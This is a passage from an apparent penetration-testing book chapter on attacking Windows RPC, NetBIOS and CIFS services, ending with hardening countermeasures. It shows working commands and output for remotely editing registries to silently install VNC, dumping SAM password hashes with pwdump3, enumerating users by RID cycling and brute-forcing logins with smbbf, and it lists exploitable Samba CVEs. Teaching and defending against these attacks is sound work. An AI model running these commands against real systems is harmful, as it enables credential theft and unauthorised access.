To execute commands directly through the SCM (as opposed to the Task Scheduler), we can use PsExec (part of the Sysinternals PsTools package, available from http://download.sysinternals.com/files/pstools.zip). PsExec usage is discussed in http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx.

Accessing and Modifying Registry Keys

You can use three tools from the Microsoft Windows NT Resource Kit to access and manipulate system registry keys on a given host:

regdmp.exe

Accesses and dumps the system registry remotely

regini.exe

Used to set and modify registry keys remotely

reg.exe

Used with the delete option to remove registry keys

After authenticating with the NetBIOS session service, regdmp is used to dump the contents of the registry. regdmp has the following usage:

REGDMP [-m \\machinename | -h hivefile hiveroot | -w Win95 Directory]
       [-i n] [-o outputWidth]
       [-s] [-o outputWidth] registryPath

Example 10-18 shows regdmp in use against 192.168.189.1 to dump the contents of the entire system registry.

Example 10-18. Using regdmp to enumerate the system registry
C:\> regdmp -m \\192.168.189.1
Registry
  Machine [17 1 8]
   HARDWARE [17 1 8]
    ACPI [17 1 8]
     DSDT [17 1 8]
      GBT__  _ [17 1 8]
       AWRDACPI [17 1 8]
        00001000 [17 1 8]
         00000000 = REG_BINARY 0x00003bb3 0x54445344 
                    0x00003bb3 0x42470101 0x20202054 
                    0x44525741 0x49504341 0x00001000 
                    0x5446534d 0x0100000c 0x5f5c1910 
                    0x5b5f5250 0x2e5c1183 0x5f52505f 
                    0x30555043 0x00401000 0x5c080600 
                    0x5f30535f 0x0a040a12 0x0a000a00 
                    0x08000a00 0x31535f5c 0x040a125f 

You can add or modify registry keys using the regini command along with crafted text files containing the new keys and values. To silently install a VNC server on a target host, you first have to set two registry keys to define which port the service listens on and the VNC password for authentication purposes. A text file (winvnc.ini in this case) is assembled first:

HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
    SocketConnect = REG_DWORD 0X00000001
    Password = REG_BINARY 0x00000008 0x57bf2d2e 0x9e6cb06e

After listing the keys you wish to add to the registry, use the regini command to insert them:

C:\> regini -m \\192.168.189.1 winvnc.ini

Removing registry keys from the remote system is easily achieved using the reg command (found within Windows NT family systems) with the correct delete option. To remove the VNC keys just set, use the following command:

C:\> reg delete \\192.168.189.1\HKU\.DEFAULT\Software\ORL\WinVNC3

Accessing the SAM Database

After compromising the password of a user in the Administrators group, the encrypted SAM password hashes can be dumped directly from the memory of the remote host, thus bypassing the SYSKEY encryption that protects the hashes stored within the SAM database file. A Windows utility known as pwdump3 can achieve this by authenticating first with the ADMIN$ share and then extracting the encrypted user password hashes. pwdump3 is available from http://packetstormsecurity.org/crackers/nt/pwdump3.zip.

Example 10-19 shows pwdump3 dumping the encrypted user password hashes from the Windows 2000 host at 192.168.189.1 to hashes.txt using the Administrator account (although any user account in the Administrators group can be used).

Example 10-19. Using pwdump3 to remotely extract password hashes
D:\pwdump> pwdump3 192.168.189.1 hashes.txt Administrator

pwdump3 by Phil Staubs, e-business technology
Copyright 2001 e-business technology, Inc.

This program is free software based on pwpump2 by Tony Sabin
under the GNU General Public License Version 2 (GNU GPL), you
can redistribute it and/or modify it under the terms of the
GNU GPL, as published by the Free Software Foundation. NO
WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS PROGRAM.
Please see the COPYING file included with this program (also
available at www.ebiz-tech.com/pwdump3) and the GNU GPL for
further details.

Please enter the password >secret
Completed.

Two tools that can be used to crack Windows password hashes downloaded in this way are as follows:

Cain & Abel (http://www.oxid.it)
John the Ripper (http://www.openwall.com/john)

Cain & Abel is more advanced, supporting rainbow table cracking of NTLM hashes, whereas John the Ripper is used to perform basic (and quick) dictionary-based attacks. Rainbow cracking of stored authentication hashes involves a time-memory trade-off, where hashes are precomputed and stored in a rainbow table, which is then cross-referenced with the hashes to reveal the passwords.

Three toolkits used to generate rainbow tables that can be used from Cain & Abel to attack many types of encrypted password hash are as follows:

Winrtgen (http://www.oxid.it/downloads/winrtgen.zip)
Ophcrack (http://ophcrack.sourceforge.net)
RainbowCrack (http://www.antsight.com/zsl/rainbowcrack)

The CIFS Service

The CIFS service is found running on Windows 2000, XP, and 2003 hosts through both TCP and UDP port 445. CIFS is the native mode for SMB access within these operating systems, but NetBIOS access is provided for backward compatibility.

Through CIFS, you can perform exactly the same tests as with the NetBIOS session service, including enumeration of user and system details, brute-force of user passwords, and system access upon authenticating (such as file access and execution of arbitrary commands).

CIFS Enumeration

In the same way that system and user information can be gathered through accessing SMB services through NetBIOS, CIFS can be directly queried to enumerate the same information: you just need the right tools for the job.

The SMB Auditing Tool (SMB-AT) is a suite of useful utilities, available as Windows executables and source code (for compilation on Linux and BSD platforms in particular) from http://www.cqure.net.

User enumeration through smbdumpusers

The smbdumpusers utility is a highly versatile Windows NT user enumeration tool that can query SMB through both the NetBIOS session (TCP 139) and CIFS (TCP 445) services. A second useful feature is that the utility can enumerate users either through a direct dump (which works with RestrictAnonymous=0) or through the RID cycling technique, which can evade RestrictAnonymous=1 by attempting to reverse each RID value to a username. Example 10-20 shows the usage and command-line options for smbdumpusers.

Example 10-20. smbdumpusers usage and command-line options
D:\smb-at> smbdumpusers

 SMB - DumpUsers V1.0.4 by ([email protected])
 -------------------------------------------------------------------
 usage: smbdumpusers -i <ipaddress|ipfile> [options]

         -i*     IP or <filename> of server[s] to bruteforce
         -m      Specify which mode
                     1 Dumpusers (Works with restrictanonymous=0)
                     2 SidToUser (Works with restrictanonymous=0|1)
         -f      Filter output
                     0 Default (Filter Machine Accounts)
                     1 Show All
         -e      Amount of sids to enumerate
         -E      Amount of sid mismatches before aborting mode 2
         -n      Start at SID
         -s      Name of the server to bruteforce
         -r      Report to <ip>.txt
         -t      timeout for connect (default 300ms)
         -v      Be verbose
         -P      Protocol version
                     0 - Netbios Mode
                     1 - Windows 2000 Native Mode

Example 10-21 shows the smbdumpusers tool dumping user information via RID cycling (as with GetAcct in Figure 10-3) through CIFS.

Example 10-21. Cycling RID values to find usernames with smbdumpusers
D:\smb-at> smbdumpusers -i 192.168.189.1 -m 2 -P1
500-Administrator
501-Guest
513-None
1000-__vmware__
1001-__vmware_user__
1002-VUSR_OSG-SERV
1003-mickey

CIFS Brute Force

The SMB-AT toolkit contains a utility called smbbf that can launch brute-force password-grinding attacks against both NetBIOS session and CIFS services. Example 10-22 shows the smbbf usage.

Example 10-22. smbbf usage and command-line options
D:\smb-at> smbbf

 SMB - Bruteforcer V1.0.4 by ([email protected])
 --------------------------------------------------------------
 usage: smbbf -i [options]

         -i*     IP address of server to bruteforce
         -p      Path to file containing passwords
         -u      Path to file containing users
         -s      Server to bruteforce
         -r      Path to report file
         -t      timeout for connect (default 300ms)
         -w      Workgroup/Domain
         -g      Be nice, automatically detect account lockouts
         -v      Be verbose
         -P      Protocol version
                     0 - Netbios Mode
                     1 - Windows 2000 Native Mode

To run smbbf against the CIFS service at 192.168.189.1, using the user list from users.txt and the dictionary file common.txt, use the syntax shown in Example 10-23.

Example 10-23. Using smbbf against the CIFS service
D:\smb-at> smbbf -i 192.168.189.1 -p common.txt -u users.txt -v -P1
INFO: Could not determine server name ...

-- Starting password analysis on 192.168.189.1 --

Logging in as Administrator  with secret on WIDGETS
Access denied
Logging in as Administrator  with qwerty on WIDGETS
Access denied
Logging in as Administrator  with letmein on WIDGETS
Access denied
Logging in as Administrator  with password on WIDGETS
Access denied
Logging in as Administrator  with abc123 on WIDGETS
Access denied

The smbbf utility can clock around 1,200 login attempts per second when grinding Windows 2000 hosts across local area networks. Against NT 4.0 hosts, the tool is much slower, achieving only a handful of login attempts per second.

If smbbf is run with only an IP address specified, it does the following:

  • Retrieves a list of valid usernames through a null session

  • Attempts to log in to each account with a blank password

  • Attempts to log in to each account with the username as password

  • Attempts to log in to each account with the password of “password”

The tool is extremely useful in this mode when performing a brief audit of a given Windows host, and can be left running unattended for extended periods of time. If multiple accounts are given to brute force, the tool will grind passwords for each account and move to the next.

Unix Samba Vulnerabilities

The Samba open source suite (http://www.samba.org) allows Linux and other Unix-like platforms to operate more easily within Windows NT domains and provides seamless file and print services to SMB and CIFS clients. A number of remote vulnerabilities have been found in Samba services, allowing attackers to execute arbitrary code and commands and bypass security restrictions.

At the time of this writing, the MITRE CVE list contains a number of serious remotely exploitable issues in Samba (not including DoS issues), as shown in Table 10-8.

Table 10-8. Remotely exploitable Samba vulnerabilities

CVE reference(s)                  Date         Notes
--------------------------------  -----------  ------------------------------------------------------------------------------------
CVE-2007-2446 and CVE-2007-2447   15/05/2007   Multiple Samba 3.0.25rc3 MSRPC component vulnerabilities
CVE-2007-0453                     05/02/2007   nss_winbind.so.1 (as used by Samba 3.0.23d on Solaris) arbitrary code execution via DNS functions
CVE-2004-1154                     16/12/2004   Samba 3.0.9 MSRPC heap overflow
CVE-2004-0882                     15/10/2004   Samba 3.0.7 QFILEPATHINFO request handler overflow
CVE-2004-0815                     30/09/2004   Samba 3.0.2a malformed pathname security restriction bypass
CVE-2003-1332                     27/07/2003   Samba 2.2.7 reply_nttrans() overflow
CVE-2003-0201                     07/04/2003   Samba 2.2.7 call_trans2open() overflow
CVE-2003-0085                     14/03/2003   Samba 2.2.7 remote packet fragment overflow
CVE-2002-1318                     20/11/2002   Samba 2.2.6 password change request overflow
CVE-2002-2196                     28/08/2002   Samba 2.2.4 and prior enum_csc_policy() overflow
CVE-2001-1162                     24/06/2001   Samba 2.0.8 and prior remote file creation vulnerability

MSF supports CVE-2003-0201 and CVE-2007-2446. Immunity CANVAS supports CVE-2003-0201 and CVE-2003-0085, and CORE IMPACT supports CVE-2003-0201, CVE-2003-0085, CVE-2007-2446, and CVE-2007-2447 at this time. Milw0rm (http://www.milw0rm.com) has a number of useful Samba exploits, including exploits for the Samba SWAT web server.

Depending on the open network ports of a given Unix-like host running Samba, you will be presented with a number of avenues to perform enumeration and brute-force password-grinding attacks. In particular, refer to the earlier examples of attacks launched against MSRPC, NetBIOS session, and CIFS services because the same tools will be equally effective against accessible Samba services running on ports 135, 139, and 445, respectively.

Windows Networking Services Countermeasures

The following countermeasures should be considered when hardening Windows services:

  • Filter public or untrusted network access to high-risk services, especially the RPC endpoint mapper (TCP and UDP port 135), and the NetBIOS session and CIFS services (TCP ports 139 and 445), which can be attacked and used to compromise Windows environments. Do not forget to filter RPC service endpoints, accessible on TCP and UDP ports above 1025.

  • Ensure local administrator account passwords are set because these are often set to NULL on workstations when domain authentication is used. If possible, disable the local computer Administrator accounts across your network.

  • Enforce a decent user account lockout policy to minimize the impact of brute-force password-grinding attacks.

Microsoft RPC service-specific countermeasures:

  • If RPC services are accessible from the Internet, ensure that the latest Microsoft security patches relating to RPC components are installed and kept up to date.

  • Disable the Task Scheduler and Messenger services if they aren’t required. The Task Scheduler can be used by attackers to remotely execute commands, and both services have known memory management issues.

  • In high-security environments, you can consider disabling DCOM completely, although it will break a lot of functionality. Microsoft KB article 825750 discusses this; you can find it at http://support.microsoft.com/default.aspx?kbid=825750.

  • Be aware of threats presented by RPC over HTTP functionality within Microsoft IIS web services (when COM Internet Services is installed). Ensure that the RPC_CONNECT HTTP method isn’t allowed (unless required) through any publicly accessible web services in your environment.

NetBIOS session and CIFS service-specific countermeasures:

  • Enforce RestrictAnonymous=2 under Windows 2000, XP, and 2003 hosts to prevent enumeration of system information through NetBIOS. The registry key can be found under HKLM\SYSTEM\CurrentControlSet\Control\Lsa. Microsoft KB articles 246261 and 296405 discuss the setting in detail, available from http://support.microsoft.com.

  • Enforce NTLMv2 if possible. Fast, multithreaded brute-force tools, such as SMBCrack, take advantage of weaknesses within standard NTLM, and therefore don’t work against the cryptographically stronger NTLMv2.

  • Rename the Administrator account to a nonobvious name (e.g., not admin or root), and set up a decoy Administrator account with no privileges.

  • The Microsoft Windows 2000 Resource Kit contains a tool called passprop.exe that can lock the administrator account and prevent it from being used across the network (thus negating brute-force and other attacks), but still allows administrator logons locally at the system console. To lock the Administrator account in this way, issue a passprop /adminlockout command.
